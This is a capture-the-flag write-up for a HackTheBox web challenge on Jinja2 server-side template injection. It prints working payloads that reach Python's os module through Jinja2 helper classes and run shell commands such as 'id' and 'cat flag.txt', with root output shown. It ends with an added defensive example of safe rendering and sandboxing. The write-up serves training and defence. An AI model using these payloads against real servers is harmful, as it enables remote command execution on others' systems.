Templated: HackTheBox Web challenge My Perspective

 Proudly powered by Flask/Jinja2

In Jinja2, templates can inherit from other templates using the {% extends %} tag. When a template extends another template, it inherits the context of the parent template. The self._TemplateReference__context attribute is used to store this inherited context in the child template.

<ip>:<port>/{{self._TemplateReference__context }}

The page '<Context {'range': <class 'range'>, 'dict': <class 'dict'>, 'lipsum': <function generate_lorem_ipsum at 0x7f5a4afcfdc0>, 'cycler': <class 'jinja2.utils.Cycler'>, 'joiner': <class 'jinja2.utils.Joiner'>, 'namespace': <class 'jinja2.utils.Namespace'>,

→ {{self._TemplateReference__context }} dumps the template context, which gives access to the following classes:

→ jinja2.utils.Cycler , jinja2.utils.Joiner , jinja2.utils.Namespace

self._TemplateReference__context: This is a reference to the private __context attribute of the TemplateReference class. It provides access to the context dictionary for the current template.

Jinja templates can be rendered with a context, which is a Python dictionary containing variables that are accessible within the template. The self._TemplateReference__context attribute stores this dictionary for the current template.

To get RCE we need to reach the os module. Jinja2 itself does not expose os or any direct way to run commands, but Python objects reachable from the template context can lead to modules that do import os. So we first need to find where the os module can be reached from.

We can use .__init__.__globals__ to access the global variables of the module in which the above classes are defined.

→ {{self._TemplateReference__context.cycler.__init__.__globals__}} use this to get out of the class and access the global variables of the utils.py module where it is defined

Payloads:

{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}
{{self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read()}}
{{self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read()}}

>>> The page 'uid=0(root) gid=0(root) groups=0(root) ' could not be found

  • .os: This is the os module in Python, which provides a way to interact with the operating system.
  • .popen('id').read(): This is a method call on the os module that runs the id command in the shell and reads its output. The popen() method opens a pipe to the shell, and the read() method reads the output from that pipe.

The expression is already evaluated inside the template context, because the template engine renders it with that same context. So we can drop the "self._TemplateReference__context." prefix from the payload and reference the classes directly.

Final payload:

This is the payload to reach the os module through a Server-Side Template Injection in Jinja2.

{{namespace.__init__.__globals__.os.popen('ls').read()}}

{{namespace.__init__.__globals__.os.popen('cat flag.txt').read()}}

We can also use any other class mentioned above.
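As an added example (not part of the original writeup), the Flask/Jinja2 anti-pattern that makes the chain above possible, shown beside two fixes: passing user input as a context variable instead of template source, and rendering untrusted template source in Jinja2's SandboxedEnvironment, which refuses the __init__.__globals__ hop. It assumes Jinja2 is installed; the function names and the harmless {{ 7 * 7 }} probe are my own.

```python
# Added example, not code from the original post. Assumes Jinja2 is installed.
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Constructed probe: only evaluates if the input is compiled as template
# source, so it tells the two code paths apart without running commands.
PROBE = "{{ 7 * 7 }}"


def render_vulnerable(user_input: str) -> str:
    """Anti-pattern: user input is concatenated into the template SOURCE,
    so any {{ ... }} the user sends is parsed and evaluated."""
    env = Environment()
    return env.from_string("Hello " + user_input).render()


def render_safe(user_input: str) -> str:
    """Fix 1: the template is a constant and user input is a context
    VARIABLE, so it is only printed, never parsed."""
    env = Environment(autoescape=True)
    return env.from_string("Hello {{ name }}").render(name=user_input)


def render_sandboxed(template_source: str) -> str:
    """Fix 2, for apps that must render user-supplied templates (themes,
    mail templates): the sandbox refuses attributes starting with '_',
    so the class -> __init__ -> __globals__ -> os chain from the writeup
    raises SecurityError instead of yielding the os module."""
    env = SandboxedEnvironment()
    return env.from_string(template_source).render()


def sandbox_blocks(template_source: str) -> bool:
    """True if the sandbox rejected the template at render time."""
    try:
        render_sandboxed(template_source)
    except SecurityError:
        return True
    return False


if __name__ == "__main__":
    print(render_vulnerable(PROBE))  # Hello 49  -> input was executed
    print(render_safe(PROBE))        # Hello {{ 7 * 7 }} -> input stayed data
    # 'namespace' is one of Jinja2's default globals, which is why the
    # writeup can drop the self._TemplateReference__context prefix; the
    # sandbox still stops the traversal at __init__.
    print(sandbox_blocks("{{ namespace.__init__.__globals__ }}"))  # True
```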
